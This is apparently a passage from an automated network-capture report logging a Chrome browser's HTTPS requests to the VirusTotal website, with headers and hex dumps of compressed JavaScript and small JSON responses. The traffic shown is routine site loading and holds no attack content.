                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100ff8\i{F_B?HIC#ecM04[} dvd",p3?8.|0hrljm?{{v:{
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 01 9e b3 5c e8 9c 87 bb 3b 3b db 96 3b e3 59 e6 4f 38 75 5a d9 bb 9d 6e f7 d1 ad f3 5d 86 e9 22 7b 93 e4 7e 74 e2 c7 c1 30 b9 2e 66 ce 30 33 a9 a9 54 cd 9f 79 38 04 ad d6 dc ec 72 62 99 29 b8 3a f5 4c 52 61 d6 bb 2f 18 98 fb 72 c2 ae 88 52 3d a3 cb 67 06 9b f2 70 32 cd d5 8f cb 90 5f 7d 97 5c 7b 46 87 75 58 6f 1b ff 19 6c 1c 42 7f 19 71 12 73 83 5d cf a2 38 f3 8c 69 9e cf fb 9b 9b 57 57 57 ee d5 96 9b a4 93 cd 5e a7 d3 d9 c4 d4 c6 fe 17 8f e7 a0 0f 31 ca 49 17 11 f7 0c 0e 99 98 04 81 c1 46 51 38 5f 7f 17 78 c6 8b 1e db 72 77 8e bb 1d 17 b8 e9 b2 6e cf dd c2 df e3 1e eb 75 dd de 56 a7 f7 7d af f7 13 3a 7c df fb 4d 03 f3 e5 d6 d3 bd bd e7 3b c6 26 56 a3 55 f7 bf f8 e2 0b c8 a9 41 0e 7d 37 f6 17 51 ee 65 2b 7b 67 a7 b3 bb d7 40 ea 20 36 bb 7b dd 87 38 2c 13
                                                                                                                                                                                                                    Data Ascii: \;;;YO8uZn]"{~t0.f03Ty8rb):LRa/rR=gp2_}\{FuXolBqs]8iWWW^1IFQ8_xrwnuV}:|M;&VUA}7Qe+{g@ 6{8,
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: bf d1 b1 41 da 73 44 92 02 3c c3 8c 55 6c ac 85 98 27 cf 82 fa 2c 72 fe 5c 89 36 29 4d 48 b4 e9 fe 91 d2 c1 f5 fe e0 65 a1 99 2b fd 57 2d e6 b3 0e 40 dd b3 3b 22 1c 21 f2 1d 61 af 71 58 ee d6 ea 5c 81 56 2c 55 1c ee 86 29 e3 c6 5c 98 b3 90 d6 45 df 62 1b ca f4 6d 88 66 9c 94 24 10 15 98 7d f7 15 bc 82 71 98 66 39 09 f6 15 d4 2d 19 9b ea d7 bb 0f 1f 60 9a 05 ab f3 35 89 0b 05 a0 e9 8c 01 86 36 ce 7b 47 28 dc 44 08 6c f5 0e d0 61 7c 4d fa 16 3b b9 6d b8 a1 45 b3 81 d1 75 c1 fb 91 28 15 d2 97 34 69 15 a3 61 f6 04 11 fa 4b ae c2 ff 8a 57 36 cc 0d c2 64 8e ff c7 0f 1e 74 36 3c 2f 46 ec 92 9f c6 67 c2 29 40 7c 3e 17 0f ab a6 4c d2 c0 b4 1e bd 14 49 a5 9a 95 c3 8b a8 92 32 07 d7 74 9c 82 c9 80 41 34 cd 29 8c 4f a1 ec 82 5d aa 66 ff 0d 94 ce 8d 50 3a 7e 5d 63 40
                                                                                                                                                                                                                    Data Ascii: AsD<Ul',r\6)MHe+W-@;"!aqX\V,U)\Ebmf$}qf9-`56{G(Dla|M;mEu(4iaKW6dt6</Fg)@|>LI2tA4)O]fP:~]c@
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC334INData Raw: 9c a7 9d 33 e4 c2 87 29 f7 2f 06 6a 75 c8 64 91 a5 a9 40 90 b6 40 90 6a 08 d2 2a 04 88 17 91 86 79 cd 91 84 cc 10 a7 91 33 d9 e5 62 cd f4 25 77 a1 0f 7e 4e a1 23 a8 f6 0a 91 19 91 5d 04 09 ac 48 f3 3c 05 22 1f 75 b6 09 91 54 bd f0 dc 7e 23 ed 68 5d d9 c6 de ea 72 35 1b 95 75 28 2f 59 e6 e9 8d d0 59 a8 57 3b 0d cf 50 8c 86 d4 bb ef 52 38 9a af 46 14 52 a2 d2 24 95 e6 13 bc 87 02 3d 6b e5 bb 01 aa 16 0e 72 33 b2 fa af d2 04 11 36 8e 88 38 14 16 a2 03 91 e5 42 e0 c5 66 6a 67 d6 aa 58 f8 49 65 1e fd 52 a9 cb 5c 30 bb 1d 97 85 7e 4a 7f 0a 1b 51 4d 6f 9a c5 28 9a 58 c0 1c a2 c6 0e 5e 47 74 43 f6 b1 35 d0 1d 58 42 6b bd 35 43 1b 3d 6d 2a 34 34 62 e8 47 b0 5d 05 1e bf d1 27 9f a6 c9 95 e8 94 98 52 ca 08 0f ba dc c2 8f 15 62 f4 0c d2 28 54 86 17 18 1b ba 92 f0 e4
                                                                                                                                                                                                                    Data Ascii: 3)/jud@@j*y3b%w~N#]H<"uT~#h]r5u(/YYW;PR8FR$=kr368BfjgXIeR\0~JQMo(X^GtC5XBk5C=m*44bG]'Rb(T
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 9b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 27 0d 0a 30 30 30 30 30 30 30 31 0d 0a d2 0d 0a 30 30 30 30 30 30 30 31 0d 0a 91 0d 0a 30 30 30 30 30 30 30 31 0d 0a 75 0d 0a 30 30 30 30 30 30 30 31 0d 0a 61 0d 0a 30 30 30 30 30 30 30 31 0d 0a e8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 46 0d 0a 30 30 30 30 30 30 30 31 0d 0a 58 0d 0a 30 30 30 30 30 30 30 31 0d 0a ca 0d 0a 30 30 30 30 30 30 30 31 0d 0a cd 0d 0a 30 30 30 31 31 61 32 0d 0a 90 ac e6 e6 43 db e9 5a 03 43 56 17 62 52 0f 81 1c 48 ac 32 8a 8b c8 66 0c 5c 57 de b8 94 c6 b2 04 2c 2f fc b9 18 03 c9 76 c2 29 e8 82 00 90 22 18 b9 b5 31 08 04 8b 89 ce 48 70 c8 5a 4e 35 64 f3 bf cd 83 fe db f0 c3 91 85 38 e5 41 ff e1 87 ee ee 87 ad 9e 85 47 58 cc b3 39 0f ac 03 31 c9 57 9b 6e 4e 2c 12 eb
                                                                                                                                                                                                                    Data Ascii: 0000000100000001'000000010000000100000001u00000001a0000000100000001F00000001X000000010000000100011a2CZCVbRH2f\W,/v)"1HpZN5d8AGX91WnN,
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: fc 07 e2 a6 8d d1 d7 b1 63 ec e0 08 25 80 87 7e 1a 14 3b 28 86 50 b2 30 89 8f b1 65 37 8c 47 d1 22 80 6d 61 7c d9 ff 9f 3e 91 95 57 94 61 54 56 33 10 71 41 d4 0f e6 fa da 6e c3 b9 98 5e de f9 69 60 15 f5 22 f3 da 80 d7 3c 9b c3 11 e3 af f9 88 43 79 8b 9b 42 50 ff 05 64 48 b8 c9 12 66 74 84 c6 06 c5 c9 fe 24 20 c0 37 ca ce 84 7f ec c1 7d d5 18 b8 77 d0 80 cc 70 32 fd 62 17 97 b9 06 1b 10 2c b0 ec 4d d4 a9 90 31 3f d0 16 8b 90 df 10 09 3a 6c 47 91 0f a9 d6 e7 fe 0d 65 72 aa 41 98 4a 08 e4 32 1f d0 fd 1f ee 72 88 5a 45 ee 08 e9 68 c1 4b d1 29 aa e1 91 94 5f 50 33 c2 66 d4 1f d6 54 19 99 88 5d 94 23 94 3e 41 ec 8e 21 ba 56 38 4b 52 09 47 31 8a 53 9e 91 8e 90 78 23 17 45 06 1b d4 ad 0e 72 6a 35 51 50 5f 17 6e f5 0c fb 15 37 3f c4 ae 06 a9 77 ec 5e bf 04 cd a0
                                                                                                                                                                                                                    Data Ascii: c%~;(P0e7G"ma|>WaTV3qAn^i`"<CyBPdHft$ 7}wp2b,M1?:lGerAJ2rZEhK)_P3fT]#>A!V8KRG1Sx#Erj5QP_n7?w^
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: e2 b7 fc 92 40 e5 05 61 73 22 ca 58 fa 88 a3 a7 a6 e3 0c 33 98 a8 30 13 70 eb 19 ac 37 b1 e4 12 88 7b 39 59 f8 9e 63 e8 f6 fc 5a bc 23 f6 1c 93 6b 02 58 7c 84 39 f1 72 f5 7b 2c 20 35 4f e5 f5 c1 33 6b 0d 66 fa 44 81 ec 27 82 4e e2 ae 64 3f 4e f2 5b 07 d0 de c4 6a 25 a0 f2 f6 49 05 5c 55 82 25 21 9d e3 6e 35 2c f3 3e db ee cc af 59 0f ff 88 e1 a2 ce b9 32 86 ea c5 8a dd 21 69 8a fb 7e c8 7d ce 32 60 4f 78 22 eb 40 32 09 2f b9 8d 72 4b 04 18 90 21 26 9f e1 7a 99 c2 74 a7 39 90 ea a5 c5 65 4d 35 b0 82 ca 87 0a 3a 71 a9 cc 81 1f 32 02 82 e3 e4 2a f5 e7 62 62 72 3a 1c 8d e7 3e a3 c0 e7 3c 0b 33 d1 56 be 96 b8 6e 2e 2c ee 80 ca 45 ff ba 05 a4 b4 54 f7 58 97 44 7e 8e 53 7d a7 a8 64 a7 a7 b6 b6 d6 2a 0b da 54 27 7d 38 28 63 9d 00 85 29 dd 4e 20 da 14 43 41 4b ae
                                                                                                                                                                                                                    Data Ascii: @as"X30p7{9YcZ#kX|9r{, 5O3kfD'Nd?N[j%I\U%!n5,>Y2!i~}2`Ox"@2/rK!&zt9eM5:q2*bbr:><3Vn.,ETXD~S}d*T'}8(c)N CAK
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC444INData Raw: 67 95 d3 d2 22 ee 52 88 e5 ae fe 24 0c ca 89 d7 e7 54 a4 e2 08 af f9 2e 8a a6 7b a7 d9 62 88 82 3c eb ce 39 5a d1 a6 79 5c f8 42 b8 fd 80 52 c1 30 bb 75 1e 78 63 22 ad d0 08 7d ea 69 ee 07 85 a6 f8 37 20 11 a5 12 ad d8 b8 95 ef a8 b8 e2 73 79 4d 2e 47 01 97 c2 fa f8 28 a1 ad 0f 8f 76 ab 0b 2b ee 84 7a 55 d1 8b 11 3e 9b 4b 5f 63 f8 7f d6 8b 7e 8c 9a 0f 32 cd fb cf 51 d2 82 1b 2f 30 f2 19 c7 9d bf 95 b4 1b 64 00 5a 66 05 ce 2c 8b 89 60 4f a1 62 29 20 b7 92 af a4 27 26 1d b1 8a 49 85 ea 07 06 a3 49 4c 09 e7 88 3e 1c 27 07 30 5c b1 0b 6e 96 15 83 12 df e0 9d 5f ab 65 4f f5 8a 0c 1f 5a 84 73 e4 e2 16 ef b2 09 6b 4f 4e 3c 28 5a 1c 8a 7e 88 8f 2f f5 71 2a d3 e6 6c 98 a7 1f e7 53 18 00 f8 f8 a8 d9 b5 ca 49 9d 00 f5 2a 37 7d b7 97 dd 37 aa d7 32 6a bb 65 14 4c 2e
                                                                                                                                                                                                                    Data Ascii: g"R$T.{b<9Zy\BR0uxc"}i7 syM.G(v+zU>K_c~2Q/0dZf,`Ob) '&IIL>'0\n_eOZskON<(Z~/q*lSI*7}72jeL.
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    84192.168.2.164980874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC648OUTGET /gui/76703.305a02d74b372f34e459.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 5969bb76b4874773e7ad392e03b2117c
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 13:01:59 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 13:01:59 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 543198
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 94 0d 0a 30 34 30 37 0d 0a 61 6f db 36 10 86 bf ef 57 70 da 66 90 83 ac c8 76 1c 3b 52 e8 14 cb 56 20 40 8b 0c 05 f6 65 81 d1 52 d2 49 66 43 93 1a 49 29 71 6d fd f7 9d 64 3b db 10 60 9f 44 49 47 de 7b ef 3d c7 a0 71 40 9c b7 32 f7 41 4a 1d a8 32 7a 86 ac 16 f9 d3 dd a6 d1 4f ad ff dc c8 cf 5b 21 35 ff 9f
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001|000000010407ao6Wpfv;RV @eRIfCI)qmd;`DIG{=q@2AJ2zO[!5
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC144INData Raw: ea f3 99 ff 0a 9a 62 50 b0 ea 91 c5 e2 09 b2 78 73 d1 47 ae c8 cd 05 8a 58 91 2f 78 97 46 7d 69 1a ec 7b d3 58 bf b9 c7 01 c1 52 d2 96 d7 f4 11 5b 67 a2 fc c8 b4 82 fe 7a 62 34 50 a6 ea a1 6e 25 3c 07 6c 1d b6 2c f4 78 4f 94 a2 51 9e b7 5d b7 66 e9 77 17 17 3f 10 87 c7 e5 f0 11 e1 c3 d4 7f 7c fa c0 87 db 3e 9a c5 73 11 4f 8b c5 65 36 5b 4c cb d9 25 5c ce af a3 af 2e da 8a fa 6f 00 00 00 ff ff 03 00 8d b4 ee 4b 69 06 00 00 0d 0a
                                                                                                                                                                                                                    Data Ascii: bPxsGX/xF}i{XR[gzb4Pn%<l,xOQ]fw?|>sOe6[L%\.oKi
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    85192.168.2.164981074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC456OUTGET /ui/cookie_disclaimer HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC882INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3d020bd1c75649c0f0e72728c4a59a05
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:17 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 45
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:17 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC45INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 73 68 6f 77 22 3a 20 66 61 6c 73 65 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "data": { "show": false }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    86192.168.2.164981274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC457OUTGET /ui/user_notifications HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3f5e7b24e360f8d35967409e5298513d
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:17 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    87192.168.2.164981174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC648OUTGET /gui/45518.056c1f55be49c167cf84.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.1.291708482.1714074916; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074915.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 0690a5b7ee80b5136d54af41f7f1db3b
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:54:19 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:54:19 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36058
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 66 66 65 0d 0a 08 00 00 00 00 00 02 ff ec bd 09 77 9d c7 91 a6 f9 57 ae 39 65 17 e1 02 a0 bb 2f a0 61 97 1b 55 3d f4 19 aa ec 63 57 a9 a7 e5 f1 e9 c2 72 49 a2 04 02 68 2c a4 68 9a ff 7d 9e 37 32 63 b9 00 48 ad b6 3c 73 64 59 42 64 dc c8 2d 32 32 32 32 32 32 bf c7 d7 eb b3 e7 bb 6f d6 47 97 87 c7 5f 1c bc bc 3d ff e2 f5 cd ff ba 3d fd 5f af 0e 4f cf f7 3f f2 db 5f fe f2 c7 3f 6d ed 5e de 5e bf 7c fc c7 3f 4e 67 b3 d1 f2 4f db ef ec ef de e3 83 ed f5 f6 d5 d6 fe 2f df 3d ba bd 5e 0f ae 6f ae 4e 8f 6f 1e 3d 79 7d 78 35 b8 d9 bf 7a bc 98 2d 57 ab ad ed 73 81 c3 f9 64 b6 b5 7d 0d 38 1d 8d 97 5b db 17 40 cb f9 6c 36 dd da 3e 04 5c 51 ec 70 eb c9 d9 fa 66 70 ba 7d b4 7d b6 7f b0
                                                                                                                                                                                                                    Data Ascii: 000000010000000100ffewW9e/aU=cWrIh,h}72cH<sdYBd-222222oG_==_O?_?m^^|?NgO/=^oNo=y}x5z-Wsd}8[@l6>\Qpfp}}
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: 7f f9 ee 60 f7 e6 e2 e6 f0 ec 37 37 eb 57 d7 75 0e fb aa 71 b0 bb 39 e7 9b 1c 6d cc 50 3a da 04 e9 0f 1d fd f8 60 ab 29 cc c1 1a 0d 75 b2 be 39 3c 3d db 45 94 d7 5f 3e 69 1d f8 c9 fe fe ba 0f 44 e5 e6 7a eb 7d 4d 52 ca fd da f6 0f da 60 dd e5 c0 fb a2 d4 be 7a 9c 5c 2d b4 51 ec f5 d4 ba ad 62 a7 32 e5 b1 f5 1e 4e 9f d8 24 b1 c5 60 70 b0 ff 9f 37 57 87 e7 d7 67 cc b0 ff fb f1 ce 3f bc 1b 0d 87 3f bf df e0 f7 3f dd fa cf ae 50 1f b3 02 ec be bc 79 75 b6 f5 f8 08 b9 3c da 3f fb cf c1 2f 4e 4e 5f 0f fe f9 95 a6 20 73 fc 6a ff d1 3f bc 1b be 7f e4 98 db 1b 47 d8 da b4 ff a8 69 a6 1d 5a 00 53 d1 03 03 65 7a 7e 76 f1 66 e7 e5 e9 c9 c9 fa 7c 70 79 71 7d 2a 83 60 e7 8a a5 48 4b c9 a3 5f 0e 7e 71 38 b8 ba 38 5b ef 3f 3a ba bd b9 b9 38 7f 34 e8 85 5d 1e be a0 84 c8
                                                                                                                                                                                                                    Data Ascii: `77Wuq9mP:`)u9<=E_>iDz}MR`z\-Qb2N$`p7Wg???Pyu<?/NN_ sj?GiZSez~vf|pyq}*`HK_~q88[?:84]
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC1408INData Raw: cd 17 a3 21 4e c8 cf 0d f7 e5 d6 f6 53 c3 e1 bf dc da fe cc 70 4f b7 b6 7f 03 6e 89 89 34 df da fe 2f c3 fd a6 d9 4a 7f d8 fe f3 f6 ef d3 4e fa f5 8f 76 d2 f7 60 27 35 9b e4 1f f6 ff f8 ce 66 eb de a3 7f c1 8d f6 f6 e2 76 f0 05 3b 1b fc 8d 8f b6 fb a4 c5 bd 77 7c cc 42 78 73 3d 78 c1 26 cf 68 0e 8f 8f 71 28 b2 6f 1b 7c f6 ef 83 ff 93 7d d0 cb 47 db 65 42 93 65 70 70 f1 ea d5 ed f9 e9 cd db 01 c4 ca ce 56 89 cd e3 b5 e5 27 a3 3c d5 96 73 7b 70 48 41 17 67 2a 6d fd e5 e5 d9 c5 d5 7a 70 71 7b 65 eb 34 7a 7e f0 fa f4 fa 96 ac 6f b7 07 e6 ba 62 13 3a b8 41 3d 1c de 0c 30 63 5e 5d 9c b3 c4 dc 9c ae af 07 f8 3a 07 2f e4 b0 62 5f 30 60 7d 3f 3d 3e c4 85 7a cd 12 21 42 26 f3 ab d3 eb f5 ee e0 df af de 0e 4e 6f a8 e1 46 ae e0 c1 f3 ab f5 da b2 6a a5 c7 8d a5 52 6e
                                                                                                                                                                                                                    Data Ascii: !NSpOn4/JNv`'5fv;w|Bxs=x&hq(o|}GeBeppV'<s{pHAg*mzpq{e4z~ob:A=0c^]:/b_0`}?=>z!B&NoFjRn
                                                                                                                                                                                                                    2024-04-25 19:55:17 UTC261INData Raw: 67 f9 e0 f5 6c 77 b2 3b 1e 3c f6 d1 c5 c2 41 f5 b5 5f 6d 78 b7 2c c7 c1 c5 e5 db 2b 9b e7 e3 e1 68 b4 33 1e 8e 27 83 7f 47 66 b2 a4 5f df de bc 64 e9 34 ea 67 68 aa 73 69 69 33 e1 06 9f fe e6 df 4b 05 ac 0d b7 47 56 f4 cd 9b a3 eb 4f a2 b6 4f 70 e5 1c 7d a2 55 eb 93 67 bf 39 f8 d7 7f fb c3 bf 5a d5 9f ec 5d d1 9e 77 3b f2 17 1d 9d dd ae f7 06 ff c7 f0 68 7a 72 72 f8 c4 50 32 2b 5f 5c 80 9c cf 47 c3 e7 e3 86 bc bc bd 62 21 12 f2 f9 74 7c 3c ea c8 d3 f3 2f 94 d9 fe d7 50 98 80 60 8e 67 e3 e9 78 d8 30 84 2c 70 be 07 72 3d 5b 4c 86 1d f9 76 2d 3b 19 e4 f3 e3 f5 6a be 68 94 2f 30 53 cf c1 4d 56 87 c7 d3 e3 86 bb 59 1f 9e 81 1a 0f 8f 57 ab 4e 76 fc f6 50 54 e3 e5 e2 e8 68 d6 a8 70 1c 1c f7 96 34 04 0b cb 8d ea 7c fe fc b9 97 7d f8 96 f4 dc fe 97 a8 1d 56 11 65
